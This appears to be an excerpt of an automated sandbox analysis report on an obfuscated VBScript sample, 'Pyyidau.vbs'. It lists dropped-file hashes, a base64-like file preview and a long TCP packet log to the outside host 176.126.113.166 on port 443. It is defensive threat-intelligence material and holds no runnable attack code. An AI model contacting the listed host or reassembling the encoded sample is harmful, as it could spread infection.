                                                                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOScDuOfBxIxVYfoVky6l0t/:2F0i8n0itFzDHFVBfHIxVYL01
                                                                                      MD5:C1BC575C896A3D2D0959509A9AF52E65
                                                                                      SHA1:FD3ABC9423FE308DFE530AD922D7FC71EEA83E13
                                                                                      SHA-256:F2CE54F35A0EA6000C3781473F0CD557EF9942C20A162B232955861F20410208
                                                                                      SHA-512:203C53B8AB92261F320D105822C76392D175C9B696DE12EDDAB2F153A56C6D1F418F7C894F05982F78BF51869215FD5D7CE5ECF2C9BF69F8083ADA2938024C12
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Temp\~DFFB27700813D8087C.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\setupact.log

                                                                                      Download File
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):145
                                                                                      Entropy (8bit):5.037855945672611
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:T3ZOXfFrUW+4hXqORqD2AGqKwnF2phJDCuiqQWWLNKXNn:7ZOXfFrbUORvprNCuVQon
                                                                                      MD5:87B6198D9324649BBEEA73C02010963A
                                                                                      SHA1:56B00A8FE24CE078FD6C72E334F4FD6EF182F150
                                                                                      SHA-256:AB8F255E06F0FB90E21D1D39D8E02CB3270489ED5F9A53334FCE6FF066B93808
                                                                                      SHA-512:E8BAD06BDC581D180786D9DF7FEFB57BBD0BB9F933A6F7386B72E1914F0D621A5F3582488FC3B3A1F3C2F6DF74E3711658A146A920D76DECEED0F122C1C1AE95
                                                                                      Malicious:false
                                                                                      Preview:WdfCoInstaller: [11/22/2024 20:54.07.947] ReadComponents: WdfSection for Driver Service nskbfltr using KMDF lib version Major 0x1, minor 0x5 ...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Entropy (8bit):6.129274995956151
                                                                                      TrID:
                                                                                        File name:Pyyidau.vbs
                                                                                        File size:8'816'052 bytes
                                                                                        MD5:c1108260f7a287cb16f93c11a40fbf90
                                                                                        SHA1:8eab07aef27baae17d1ce013cce58b2b43dcaa1d
                                                                                        SHA256:484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
                                                                                        SHA512:59d3023cc0287ff45894bbcce2175c8fda7a36b2f1687ab7b93fb49a578e38f874587bed0e3d69eff1a20deb4f20fc27c1155026bd962d007c9b0e8c028edc0c
                                                                                        SSDEEP:49152:1uld2u6UP5rpZxEeMuatPwmOI06dzq5kz9zV7AujEy4q7YcGqaLjt1yLQ+RZyBvd:+P5j
                                                                                        TLSH:659623611EB0DE8C7B98953D7E7E6654D3E0CEB72C3BD19142A3E74A076AA410B12F31
                                                                                        File Content Preview:REM aJCqjC/kDlc8xh/2cnisFZu2sDPv/Usk5ZUNt0jFS+JaiIfTw6uuy6/Sql0s1eJi1zn2kE7/kGtEhaaZ1lcPd3o9nOrw2VHvCOSEHFLt+BCzquAPzruTWvccjj0FFfRYwzPj7zn4cv3nB4hpe3QYV42W5it2AKi/qUHy1EoT6vPvK1kfCgnWujjiJ8czKd+DAzewbi7I4sKKI0X3BZ2z0xyVek8a+UyDwCvzk9jgjH9ib9ATY3vEJkmWlOb

                                                                                        File Icon

                                                                                        Icon Hash:68d69b8f86ab9a86

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 23, 2024 02:53:39.595139027 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:39.595163107 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:39.595736980 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:39.619699955 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:39.619712114 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:39.980245113 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:39.980539083 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.014342070 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.014360905 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.014694929 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.015371084 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.017292976 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.059963942 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.314420938 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.314503908 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.314747095 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.316544056 CET49742443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.316557884 CET44349742176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.334858894 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.334878922 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.335057020 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.335244894 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.335257053 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.683156967 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.683393955 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.683696032 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.683706999 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:40.683897018 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:40.683907032 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.027272940 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.027316093 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.027437925 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.027487993 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.028177977 CET49743443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.028192043 CET44349743176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.038624048 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.038641930 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.038817883 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.038964987 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.038971901 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.387670994 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.387810946 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.388470888 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.388474941 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.388619900 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.388627052 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.904967070 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.904999018 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.905028105 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.905108929 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.905256033 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.905273914 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.905308008 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.905426025 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.905886889 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.905910969 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.906157970 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.906157970 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.906157970 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.906177998 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:41.906347036 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:41.906541109 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.077523947 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.077543974 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.077650070 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.077739954 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.077744961 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.077923059 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.078524113 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.078532934 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.078699112 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.078797102 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.078802109 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.078901052 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.079035997 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.079380989 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.079389095 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.079536915 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.079600096 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.079603910 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.079690933 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.079901934 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249043941 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249056101 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249175072 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249272108 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249275923 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249433994 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249458075 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249468088 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249608040 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249785900 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249792099 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249939919 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.249982119 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.249993086 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.250221968 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.250310898 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.250546932 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.250556946 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.250751019 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.250758886 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.250825882 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.250906944 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.250942945 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.250948906 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.251075029 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.251127005 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.251280069 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.251400948 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.251410961 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.251583099 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.251590014 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.251738071 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.251842022 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.293086052 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.293097019 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.293365002 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.293371916 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.293414116 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.293534040 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.421763897 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.421796083 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.421926022 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.421999931 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422008991 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.422118902 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422234058 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422429085 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.422446012 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.422574997 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422574997 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422668934 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422677994 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.422728062 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.422883987 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.423175097 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.423192978 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.423326969 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.423417091 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.423425913 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.423494101 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.423612118 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424107075 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.424124956 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.424249887 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424249887 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424365997 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424379110 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.424457073 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424587011 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424737930 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.424756050 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.424890041 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.424890041 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.425004959 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.425013065 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.425067902 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.425224066 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.425645113 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.425662041 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.425851107 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.425862074 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.425939083 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.426055908 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.426367044 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.426384926 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.426702023 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.426712036 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.427016973 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.427177906 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.427195072 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.427330971 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.427407026 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.427416086 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.427501917 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.427668095 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.428143024 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.428162098 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.428334951 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.428383112 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.428391933 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.428431034 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.428551912 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.429557085 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.429574966 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.429682970 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.429760933 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.429769039 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.429864883 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.429997921 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.430382967 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.430399895 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.430814028 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.430814028 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.430826902 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.431092024 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.464894056 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.464910030 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.465046883 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.465121984 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.465130091 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.465276957 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.465753078 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.465769053 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.465904951 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.465982914 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.465990067 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.466077089 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.466232061 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.466562033 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.466577053 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.466730118 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.466908932 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.466916084 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.467094898 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.593679905 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.593698978 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.593790054 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.593888998 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.593899965 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.593991995 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594050884 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.594151020 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594161034 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.594253063 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594316959 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594451904 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.594465971 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.594489098 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594500065 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.594594002 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594656944 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.594805002 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595010996 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595026970 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595163107 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595213890 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595221996 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595319033 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595451117 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595496893 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595511913 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595618963 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595787048 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595798016 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595838070 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595854044 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595873117 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.595963001 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.595976114 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596122026 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596127033 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.596136093 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596256971 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596281052 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.596400976 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596463919 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.596474886 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596662998 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.596786976 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.596856117 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596872091 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.596988916 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.597138882 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.597148895 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.597193003 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.597311974 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.597779989 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.597799063 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.597934961 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.598113060 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.598124027 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.598294973 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:42.598539114 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:42.598556042 CET44349744176.126.113.166192.168.11.20
